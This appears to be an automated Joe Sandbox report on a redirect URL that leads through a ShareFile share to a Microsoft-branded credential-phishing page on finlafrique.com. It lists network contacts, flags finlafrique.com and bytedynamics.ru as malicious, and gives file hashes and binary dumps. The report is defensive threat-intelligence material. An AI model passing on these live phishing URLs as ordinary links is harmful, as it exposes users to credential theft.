      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      about:blank0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      papsolutionsptyltd.sf-api.com
      13.248.193.251
      truefalse
        unknown
        fastly-tls12-bam.nr-data.net
        162.247.243.29
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            sf-renderx-us-east-1.sharefile.com
            15.197.239.217
            truefalse
              unknown
              0093b71e39a6.us-east-1.sdk.awswaf.com
              18.239.83.109
              truefalse
                unknown
                js-agent.newrelic.com
                162.247.243.39
                truefalse
                  unknown
                  events.launchdarkly.com
                  54.147.5.20
                  truefalse
                    unknown
                    sf-cv.sharefile.com
                    13.248.193.251
                    truefalse
                      unknown
                      piletfeed-cdn.sharefile.io
                      13.224.189.115
                      truefalse
                        unknown
                        0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                        18.245.175.23
                        truefalse
                          unknown
                          s3-w.us-east-1.amazonaws.com
                          54.231.162.81
                          truefalse
                            unknown
                            elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.com
                            18.200.104.182
                            truefalse
                              unknown
                              code.jquery.com
                              151.101.66.137
                              truefalse
                                unknown
                                o49063.ingest.sentry.io
                                34.120.195.249
                                truefalse
                                  unknown
                                  cdnjs.cloudflare.com
                                  104.17.25.14
                                  truefalse
                                    unknown
                                    challenges.cloudflare.com
                                    104.18.94.41
                                    truefalse
                                      unknown
                                      finlafrique.com
                                      104.21.47.159
                                      truetrue
                                        unknown
                                        www.google.com
                                        216.58.206.36
                                        truefalse
                                          unknown
                                          api.ipify.org
                                          104.26.12.205
                                          truefalse
                                            unknown
                                            5352587489443840-content.customer.pendo.io
                                            34.107.168.21
                                            truefalse
                                              unknown
                                              ghs.googlehosted.com
                                              142.250.184.243
                                              truefalse
                                                unknown
                                                papsolutionsptyltd.sharefile.com
                                                76.223.1.166
                                                truefalse
                                                  unknown
                                                  bytedynamics.ru
                                                  104.21.60.231
                                                  truetrue
                                                    unknown
                                                    app.launchdarkly.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      t1.a.editions-legislatives.fr
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        citrix-sharefile-content.customer.pendo.io
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          bam.nr-data.net
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            citrix-sharefile-data.customer.pendo.io
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              sf-temp-us-east-1-production.s3.amazonaws.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/4jad9/0x4AAAAAAAhCdt4btKqKgrnA/auto/fbE/normal/auto/false
                                                                  unknown
                                                                  https://finlafrique.com/securefile.htmltrue
                                                                    unknown
                                                                    https://papsolutionsptyltd.sharefile.com/share/view/scf26ff3a4b6d4c1db1815de3794eb6befalse
                                                                      unknown
                                                                      https://papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6befalse
                                                                        unknown
                                                                        about:blankfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.185.99
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        18.245.175.23
                                                                        0093b71e39a6.11de9b12.us-east-1.token.awswaf.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        172.217.18.14
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.18.94.41
                                                                        challenges.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        54.231.162.81
                                                                        s3-w.us-east-1.amazonaws.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        151.101.130.217
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        104.21.60.231
                                                                        bytedynamics.ruUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        216.58.206.36
                                                                        www.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        13.248.193.251
                                                                        papsolutionsptyltd.sf-api.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        142.250.185.163
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        15.197.239.217
                                                                        sf-renderx-us-east-1.sharefile.comUnited States
                                                                        7430TANDEMUSfalse
                                                                        151.101.66.137
                                                                        code.jquery.comUnited States
                                                                        54113FASTLYUSfalse
                                                                        35.190.80.1
                                                                        a.nel.cloudflare.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        151.101.194.137
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        162.247.243.39
                                                                        js-agent.newrelic.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.26.13.205
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.250.184.206
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.184.243
                                                                        ghs.googlehosted.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        18.200.104.182
                                                                        elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        18.239.18.105
                                                                        unknownUnited States
                                                                        16509AMAZON-02USfalse
                                                                        13.224.189.115
                                                                        piletfeed-cdn.sharefile.ioUnited States
                                                                        16509AMAZON-02USfalse
                                                                        104.17.24.14
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.26.12.205
                                                                        api.ipify.orgUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        1.1.1.1
                                                                        unknownAustralia
                                                                        13335CLOUDFLARENETUSfalse
                                                                        108.177.15.84
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        34.107.168.21
                                                                        5352587489443840-content.customer.pendo.ioUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.185.211
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        54.147.5.20
                                                                        events.launchdarkly.comUnited States
                                                                        14618AMAZON-AESUSfalse
                                                                        104.18.95.41
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.250.185.138
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        13.107.42.16
                                                                        unknownUnited States
                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        151.101.2.217
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        3.33.222.159
                                                                        unknownUnited States
                                                                        8987AMAZONEXPANSIONGBfalse
                                                                        239.255.255.250
                                                                        unknownReserved
                                                                        unknownunknownfalse
                                                                        52.109.28.46
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        162.247.243.29
                                                                        fastly-tls12-bam.nr-data.netUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.21.47.159
                                                                        finlafrique.comUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        18.239.83.109
                                                                        0093b71e39a6.us-east-1.sdk.awswaf.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        76.223.1.166
                                                                        papsolutionsptyltd.sharefile.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        34.120.195.249
                                                                        o49063.ingest.sentry.ioUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.17.25.14
                                                                        cdnjs.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        IP
                                                                        192.168.2.16
                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1491848
                                                                        Start date and time:2024-08-12 22:18:28 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Sample URL:https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:19
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal68.phis.win@20/29@84/236
                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.99, 172.217.18.14, 108.177.15.84, 34.104.35.123, 151.101.2.217, 151.101.194.217, 151.101.66.217, 151.101.130.217
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com, c3.shared.global.fastly.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be
                                                                        InputOutput
                                                                        URL: https://papsolutionsptyltd.sharefile.com/share/view/scf26ff3a4b6d4c1db1815de3794eb6be Model: jbxai
                                                                        {
                                                                        "domain":"sharefile.com",
                                                                        "is_hosting_service":false,
                                                                        "notes":"ShareFile is a cloud-based file sharing and collaboration platform,
                                                                         not a website builder or hosting service. It allows users to share and manage files,
                                                                         but it does not provide a platform for building or hosting websites"}
                                                                        URL: https://papsolutionsptyltd.sharefile.com/share/view/scf26ff3a4b6d4c1db1815de3794eb6be Model: jbxai
                                                                        {
                                                                        "phishing_score":2,
                                                                        "brand_name":"Pap Solutions Pty Ltd",
                                                                        "reasons":"The URL 'papsolutionsptyltd.sharefile.com' appears to be a legitimate file sharing service,
                                                                         and the domain 'papsolutionsptyltd' seems to be a legitimate company name. The loading circle on the webpage suggests that the site may be experiencing technical issues or is still loading. However,
                                                                         the lack of visible content and the unusual URL structure make it slightly suspicious.",
                                                                        "interest_score":"0.608"}
                                                                        URL: https://finlafrique.com/securefile.html Model: jbxai
                                                                        {
                                                                        "result":false,
                                                                        "interest_score":"0.007"}
                                                                        URL: https://finlafrique.com/securefile.html Model: jbxai
                                                                        {
                                                                        "phishing_score":2,
                                                                        "brand_name":"Finlafrique",
                                                                        "reasons":"The URL and domain analysis suggest a legitimate domain for the brand 'Finlafrique',
                                                                         but the minimalistic design and lack of additional information make it difficult to verify the authenticity of the website. Further investigation is needed to confirm the legitimacy of the website.",
                                                                        "interest_score":"1.000"}
                                                                        URL: https://finlafrique.com/securefile.html Model: jbxai
                                                                        {
                                                                        "phishing_score":10,
                                                                        "brand_name":"Microsoft",
                                                                        "reasons":"The domain 'finlafrique.com' does not match the brand name 'Microsoft',
                                                                         and the domain is not associated with Microsoft. The simple design and minimalistic approach are common tactics used in phishing attempts to appear legitimate.",
                                                                        "interest_score":"1.000"}
                                                                        URL: https://finlafrique.com/securefile.html Model: jbxai
                                                                        {
                                                                        "phishing_score":10,
                                                                        "brand_name":"Microsoft",
                                                                        "reasons":"The domain 'finlafrique.com' does not match the identified brand 'Microsoft',
                                                                         the domain name contains an unusual combination of words and does not appear to be associated with Microsoft. The webpage appears to be a phishing attempt using the Microsoft brand to trick users into entering their login credentials.",
                                                                        "interest_score":"1.000"}
                                                                        Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):173012
                                                                        Entropy (8bit):5.29034295663481
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3657FACF58635F5DF2A03D73891690A2
                                                                        SHA1:14B8542579E991380B10696B0E151274DD6D1B0A
                                                                        SHA-256:DB8422B7DC6F8FEBE52316F5CCA777902673D02F8052BFA25C31217C305B80A3
                                                                        SHA-512:BFEBF379134CC453D93C288925D2EEAB966DAF4895B03ED909ABCF827A540C28373E553C7A8BD63C165628138A39546E7F26D23AD1A12456875696CB26A6626F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-12T20:19:49">.. Build: 16.0.17902.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                                                        Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.1198006150688605
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E7345EF5C7DE23D2022B6DC9964C4A73
                                                                        SHA1:7E798FA05ED61B05E7C3E6BAD84C5A692D00B5B0
                                                                        SHA-256:C5D30F801DC96757BDB3FC4C750560AB0DCA12C2E91CBEC6D24DAD009FD688C1
                                                                        SHA-512:E95267F561C92A0967043BFCC2C78508DD939E8711FF471D802186AAB6649203B8E7FFD12503E73AC83CE391322C1CAE7FBA19C9FEDCC648D51237A2FA121C0F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............................................................................@..................................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................0Z.i.Y..........................H.x.M.A.l.w.a.y.s.O.n.L.o.g...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.m.i.c.r.o.s.o.f.t...w.i.n.d.o.w.s.c.o.m.m.u.n.i.c.a.t.i.o.n.s.a.p.p.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.\.L.o.c.a.l.S.t.a.t.e.\.H.x.m.A.l.w.a.y.s.O.n.L.o.g...e.t.l.......P.P..........v..............................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):3.710231238965834
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:26B9DF5CB284781AFCF18ABE1A5B5215
                                                                        SHA1:9EE50FE4171E25F06579DB7E94CB1DA98A46186F
                                                                        SHA-256:C4ED4EA10A08F892440C0785260876ADEA91419534EAE10F8B1B7334BEA8A963
                                                                        SHA-512:D436F2BA4F333E7461CD0110B454441FBB89A84930B3FCBBB892F8E2C3FB558139CD05529BAD0D9046A20090F16B87A16FB071F32E6535DE13476849EB818CD5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:regf........b.Q.7.................. ....p......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.....................................................................................................................................................................................................................................................................................................................................................gZY........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):3.7170001461810456
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:79495BB134D440989B0BAD252A3FE6CD
                                                                        SHA1:C9DD8E7734264AB7E6C31F7971435AFD5F153D88
                                                                        SHA-256:A539B6D6E9E84F7C0999E8C6BE34F2363F02A5336752E0051B571B7725B95B64
                                                                        SHA-512:78939696332E9AB0A5E55CC894EAAA5477D1B5E67F38ADDFA744C6A35A3D308095C05E1BD21E5C90DCDF19FC066252AA87C04C96E70C64FFDACE1E64FA013955
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:regf........b.Q.7.................. ....p......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.....................................................................................................................................................................................................................................................................................................................................................gZYHvLE.~...........p........UA&.Q3.O..lfq.....p..hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk ..2l.................................xb..h...............8...............ConfigSettings..p...sk..x...x...C...t.......H...X.............4.........?.......................
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 19:18:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2673
                                                                        Entropy (8bit):3.986498133617122
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:39EB65D6D152EAF330FB3BAAD7A41A28
                                                                        SHA1:4B27BBB20E7464DD6A9D908687F38A9546D752D2
                                                                        SHA-256:3B5732A32491A818A07C95AF93DE0CD88B22452C10E48B78AB1E446CE2911646
                                                                        SHA-512:F4B110F4F3F49F0B8FD32A5A4D5E1DA10FF13708B613CB0FC467FD2B2133B7D9CEB708F42BAA63D5DBC345D2B08D9836F6C11C8DC066FCEF64A948AB75804D14
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y`............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 19:18:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2675
                                                                        Entropy (8bit):3.9991553954349914
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BB51090F9746FB5F120C42ACA9539E2B
                                                                        SHA1:66FA893E5CFF4FF7E6559194E7AFA45F4F25EE07
                                                                        SHA-256:8090BEC6747A6060877A64B2068DF7F1ADF8EB543BFB788AFDFFBB74EB391813
                                                                        SHA-512:B8E568E5EC7752E36B25E05CDA1CCAD37431058397B9D9534053699760F4440AEDD247EE618B20125FD7522442749DD8FC0F9A6903C1424F05EBEDA0AC70710E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....\.w.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y`............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2689
                                                                        Entropy (8bit):4.006945495727697
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CC0603E67D59DEDDF6F1CC6C92459432
                                                                        SHA1:89B2025CE06615BFBF2094EA42D14013D68B2F6D
                                                                        SHA-256:C4B3A138445B436A6522A7BDEFAC86562803127D5250E842D226BB3A03C2C7A8
                                                                        SHA-512:9ACE6588FF70AE036FF9197FB7598AC90B561E4FFA48418A37A20A887CCAF21C56A9583C2ADDBFBD96F43905F8576DFD006FDE4DB5BD9BAF1C08724886412BA2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 19:18:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.99716101549799
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E5E76F89A0DE449BA523925CCD3D8B29
                                                                        SHA1:9B54F00D8B00F39A17117A7FE8B903D5853197E3
                                                                        SHA-256:5C23D930FAB294F856A1D47AC1620255C60685C673CCEC06C2CFE3A0A9C7FEF8
                                                                        SHA-512:5AC2809C8DA8C1A69654D2955BDA98B8191D8B5AFD49CE4D1DF2B07D1DF6646A8BFFE000FDFC574E6D926935EB3AAE1E145C0CA864727FCA5E5C512F5121F012
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....._p.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y`............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............na.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 19:18:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.986978418927001
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AEADBC97CBD3A5412175C177D92E405C
                                                                        SHA1:9027B734F8034336BC021EB85B3E4C3D7000F762
                                                                        SHA-256:96BF23D358167ED794DA62359B7D16676BE759382D2C75B87A035D1B102BF547
                                                                        SHA-512:E4B34060E09407AF34B68F0090C2889FB4DE5F252743663F72FE0C42B7E31EA284AE04C3343BAC8AF8F6E4B0793998D1D9D249BFB4E73E1CCAC53B2A264FC106
                                                                        Malicious:false
                                                                        Reputation:unknown
